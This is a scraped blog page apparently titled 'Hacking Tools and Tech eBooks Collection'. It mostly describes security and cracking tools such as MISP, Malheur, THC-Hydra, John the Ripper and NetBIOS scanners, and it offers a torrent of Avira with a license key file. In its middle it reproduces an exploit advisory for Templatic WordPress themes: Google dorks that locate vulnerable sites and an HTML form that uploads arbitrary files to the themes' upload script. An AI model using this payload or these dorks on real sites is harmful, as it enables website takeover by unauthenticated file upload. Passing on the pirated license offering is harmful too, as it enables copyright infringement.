VirAtt Virus Scanner

Description

This program is a scanner that helps detect and delete viruses such as MyDoom, Sasser, etc. Built on a custom engine developed by VirAtt Viruslab, it quickly detects and deletes virus files, terminates the processes of the virus itself, and fixes registry errors caused by the virus.

Features


  • Destroy Worm Process (Mydoom, Sasser, etc.)
  • Super small process and file
  • Delete virus and worm file in system directory
  • Fix Registry errors caused by the virus
  • Unhide Windows functions (Task Manager, MSConfig, etc.)

Never Forget To Say Thanks :D

MISP v2.1 [Malware Information Sharing Platform]

The problem we experienced in the past was the difficulty of exchanging information about (targeted) malware and attacks within a group of trusted partners or under a bilateral agreement. Even today, much of the information exchange happens in unstructured reports, where you have to copy and paste the information into your own text files, which you then have to parse in order to export to (N)IDS and systems like log searches, etc.
A huge challenge in the cyber security domain is information sharing inside and between organizations. This platform aims to facilitate:

  • central IOC database: storing technical and non-technical information about malware and attacks, … Data from external instances is also imported into your local instance
  • correlation: automatically creating relations between malware, events and attributes
  • storing data in a structured format (allowing automated use of the database for various purposes)
  • export: generating IDS, OpenIOC, plain text, XML output to integrate with other systems (network IDS, host IDS, custom tools, …)
  • import: batch-import, import from OpenIOC, GFI sandbox, ThreatConnect CSV, …
  • data-sharing: automatic exchange and synchronization with other parties and trust-groups

Exchanging information results in faster detection of targeted attacks and improves the detection ratio while reducing false positives. We also avoid reversing similar malware, as we know very quickly that others have already worked on it.


Malware Classifier [Malware Analysis Tool]

Adobe Malware Classifier is a command-line tool that lets antivirus analysts, IT administrators, and security researchers quickly and easily determine if a binary file contains malware, so they can develop malware detection signatures faster, reducing the time in which users' systems are vulnerable.
Malware Classifier uses machine learning algorithms to classify Win32 binaries – EXEs and DLLs – into three classes: 0 for “clean,” 1 for “malicious,” or “UNKNOWN.”
The tool was developed using models resulting from running the J48, J48 Graft, PART, and Ridor machine-learning algorithms on a dataset of approximately 100,000 malicious programs and 16,000 clean programs.

The tool extracts seven key features from an unknown binary, feeds them to one of the four classifiers or all of them, and presents its classification of the unknown binary.


Avira Internet Security Suite 2014 v14.0.1.179+License [Torrent]


Avira, a German antivirus company, now markets a very good antivirus product. The Avira Internet Security package offered by this company is powerful yet high-performance, and it can be considered one of the strongest security packages available. The software protects your computer against viruses, worms, Trojans, adware, spyware and bots. Its important features include very low use of system resources, very simple settings and user interface, a scanner tool with profiles, searching for and detecting malware, protection of POP3 and SMTP mail against viruses and malware, powerful servers for downloading updates faster, updates at intervals specified by the user, complete protection against phishing attacks and rootkits, and fully integrated security systems.

Key features of Avira Internet Security:
- Effective protection from viruses, Trojans, worms and other threats
- Effective detection and removal of rootkits
- High scanning speed
- New graphical interface design
- Protection of the system against phishing attacks
- Protection against all types of malware and spyware
- Special protection against viruses for email (POP3)
- Fast updates through the Premium server
- Emergency rescue system disc
- Safe web browsing and safe downloads
- Powerful embedded firewall software
- Anti-spam and passive anti-phishing
- performance to match data Abbey
- User-friendly
- and ...

- Min. 150 MB available disk space
- Min. 512 MB RAM (Windows XP)
- Min. 1024 MB RAM (Windows Vista, Windows 7)
- For all installations: Windows Internet Explorer 6.0 or higher
- Administrator rights are required for the installation

1. Run the setup file and install it.
2. Select offline activation and activate using the key file.


[Malheur v0.5.4] Malware Analyzer


Malheur is a tool for the automatic analysis of malware behavior (program behavior recorded from malicious software in a sandbox environment). It has been designed to support the regular analysis of malicious software and the development of detection and defense measures. Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes.

Analysis of malware behavior?
Malheur builds on the concept of dynamic analysis: Malware binaries are collected in the wild and executed in a sandbox, where their behavior is monitored during run-time. The execution of each malware binary results in a report of recorded behavior. Malheur analyzes these reports for discovery and discrimination of malware classes using machine learning.

Malheur can be applied to recorded behavior in various formats, as long as monitored events are separated by delimiter symbols, for example as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox and Joebox.


Malcom [Malware Communication Analyzer]

Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic. This comes in handy when analyzing how certain malware species try to communicate with the outside world.

Malcom can help you:

  • detect central command and control (C&C) servers
  • understand peer-to-peer networks
  • observe DNS fast-flux infrastructures
  • quickly determine if a network artifact is 'known-bad'
The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network. Convert network traffic information to actionable intelligence faster.
Check the wiki for a Quickstart and some nice screenshots.
In the near future, it will also become a collaborative tool (coming soon!)


Watcher [Passive Web-Security Scanner]

Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems, so it's completely safe to use in cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers with hot-spot detection for vulnerabilities, developers with quick sanity checks, and auditors with PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.
Major Features:

  1. Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, CSS, and development frameworks (e.g. ASP.NET, JavaServer)
  2. Works seamlessly with complex Web 2.0 applications while you drive the Web browser
  3. Non-intrusive, will not raise alarms or damage production sites
  4. Real-time analysis and reporting - findings are reported as they’re found, exportable to XML, HTML, and Team Foundation Server (TFS)
  5. Configurable domains with wildcard support
  6. Extensible framework for adding new checks
Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com. Fiddler provides all of the rich functionality of a good Web/HTTP proxy. With Fiddler you can capture all HTTP traffic, intercept and modify, replay requests, and much much more. Fiddler provides the HTTP proxy framework for Watcher to work in, allowing for seamless integration with today’s complex Web 2.0 or Rich Internet Applications. Watcher runs silently in the background while you drive your browser and interact with the Web-application.
Watcher is built in C# as a small framework with 30+ checks already included. It's built so that new checks can be easily created to perform custom audits specific to your organizational policies, or to perform more general-purpose security assessments. Examples of the types of issues Watcher will currently identify:

  • ASP.NET VIEWSTATE insecure configurations
  • JavaServer MyFaces ViewState without cryptographic protections
  • Cross-domain stylesheet and javascript references
  • User-controllable cross-domain references
  • User-controllable attribute values such as href, form action, etc.
  • User-controllable javascript events (e.g. onclick)
  • Cross-domain form POSTs
  • Insecure cookies which don't set the HttpOnly or Secure flags
  • Open redirects which can be abused by spammers and phishers
  • Insecure Flash object parameters useful for cross-site scripting
  • Insecure Flash crossdomain.xml
  • Insecure Silverlight clientaccesspolicy.xml
  • Charset declarations which could introduce vulnerability (non-UTF-8)
  • User-controllable charset declarations
  • Dangerous context-switching between HTTP and HTTPS
  • Insufficient use of cache-control headers when private data is concerned (e.g. no-store)
  • Potential HTTP referer leaks of sensitive user-information
  • Potential information leaks in URL parameters
  • Source code comments worth a closer look
  • Insecure authentication protocols like Digest and Basic
  • SSL certificate validation errors
  • SSL insecure protocol issues (allowing SSL v2)
  • Unicode issues with invalid byte streams
  • Sharepoint insecurity checks
  • more….

THC-Hydra v7.6

Hydra is a parallelized network logon cracker which supports numerous protocols to attack. New modules are easy to add, and the tool is flexible and very fast.
Features
  • IPv6 Support
  • Graphical User Interface
  • Internationalized support (RFC 4013)
  • HTTP proxy support
  • SOCKS proxy support
The tool supports the following protocols:

Samba, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more.


Password Analysis & Cracking Kit

PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in the analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character sets and other password characteristics. The toolkit generates valid input files for the Hashcat family of password crackers.

NOTE: The toolkit itself is not able to crack passwords, but is instead designed to make the operation of password crackers more efficient.


Wordpress Templatic Themes CSRF File Upload Vulnerability

#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]
#Author : Jje Incovers
#Date : 31/03/2014
#Category : Web Applications
#Type : PHP
#Tested : Mozilla, Chrome, Opera -> Windows & Linux
#Vulnerability : CSRF
 
#Dork :
inurl:/wp-content/themes/Realestate/
inurl:/wp-content/themes/dailydeal/
inurl:/wp-content/themes/nightlife/
inurl:/wp-content/themes/5star/
inurl:/wp-content/themes/specialist/
 
CSRF File Upload Vulnerability
 
 
<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php">
 
<br>
</br>
<input name="uploadfile[]" type="file" />
 
<br>
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>
 
File Access :
 
Note :
Script CSRF equate with dork you use
 
########################################
#Greetz : SANJUNGAN JIWA , All Indonesian H4xor
#Thanks : All member SANJUNGAN JIWA , Co-p1r3 , Jje Incovers , MrTieDie , Ice-Cream ,
########################################
 
# 90952935D5011A31   1337day.com [2014-04-03]   69BF4D7EF87E2E8E #


Hashkill 0.3.1

Hashkill is an open-source hash cracker for Linux that uses OpenSSL. Currently it supports 4 attack methods (dictionary, bruteforce, hybrid).

Hashkill has 35 plugins for different types of passwords (ranging from simple hashes like MD5 and SHA1 to passworded ZIP files and private SSL key passphrases).
Multi-hash support (you may load hashlists of length up to 1 million) and very fast GPU support on Nvidia (compute capability 2.1 cards also supported) and ATI (4xxx, 5xxx and 6xxx).


The latest update includes 9 new plugins: bfunix, drupal7, django256, sha256unix, mssql-2012, o5logon, msoffice-old, msoffice, luks. Of these, msoffice-old is currently supported on CPU only; the rest are GPU-accelerated. Improved bitmap handling has been added to the non-salted kernels, so that huge hashlists are cracked at faster speeds. Thermal monitoring can now be disabled using the -T 0 command-line argument.


John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.
John the Ripper is free and Open Source software, distributed primarily in source code form. If you would rather use a commercial product tailored for your specific operating system, please consider John the Ripper Pro, which is distributed primarily in the form of "native" packages for the target operating systems and in general is meant to be easier to install and use while delivering optimal performance.


Changelog v1.8.0

  • Revised the incremental mode to let the current character counts grow for each character position independently, with the aim to improve efficiency in terms of successful guesses per candidate passwords tested.
  • Revised the pre-defined incremental modes, as well as external mode filters that are used to generate .chr files.
  • Added makechr, a script to (re-)generate .chr files.
  • Enhanced the status reporting to include four distinct speed metrics (g/s, p/s, c/s, and C/s).
  • Added the "--fork=N" and "--node=MIN[-MAX]/TOTAL" options for trivial parallel and distributed processing.
  • In the external mode compiler, treat character literals as unsigned.
  • Renamed many of the formats.
  • Updated the documentation.
  • Relaxed the license for many source files to cut-down BSD.
  • Relaxed the license for John the Ripper as a whole from GPLv2 (exact version) to GPLv2 or newer with optional OpenSSL and unRAR exceptions.
  • Assorted other changes have been made.


NETBIOS nameserver scanner

This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, which is a first step in finding open shares. It is based on the functionality of the standard Windows tool nbtstat, but it operates on a range of addresses instead of just one. I wrote this tool because the existing tools either didn't do what I wanted or ran only on the Windows platforms: mine runs on just about everything.


NetBIOS Scanner

NetBScanner is a network scanner tool that scans all computers in the IP addresses range you choose, using NetBIOS protocol. For every computer located by this NetBIOS scanner, the following information is displayed: IP Address, Computer Name, Workgroup or Domain, MAC Address, and the company that manufactured the network adapter (determined according to the MAC address). NetBScanner also shows whether a computer is a Master Browser. You can easily select one or more computers found by NetBScanner, and then export the list into csv/tab-delimited/xml/html file.


MAC Address Scanner v1.5

MAC Address Scanner is a free desktop tool to remotely scan and find the MAC addresses of all systems on your local network.
It allows you to scan either a single host or a range of hosts at a time. During the scan, it displays the current status for each host. After completion, you can generate a detailed scan report in HTML/XML/TEXT/CSV format.
Note that you can find the MAC address only for systems within your subnet. For all others, you will see the MAC address of the gateway or router.
On certain secure WiFi configurations with MAC filtering enabled, this tool can help pentesters find active MAC addresses and then use them to connect to such wireless networks.
Being a GUI-based tool makes it very easy to use for users of all levels, including beginners.
It is fully portable and works on all platforms from Windows XP to Windows 8.


Copyright © 2013 Hacking Tools and Tech eBooks Collection and Blogger Templates - Anime OST.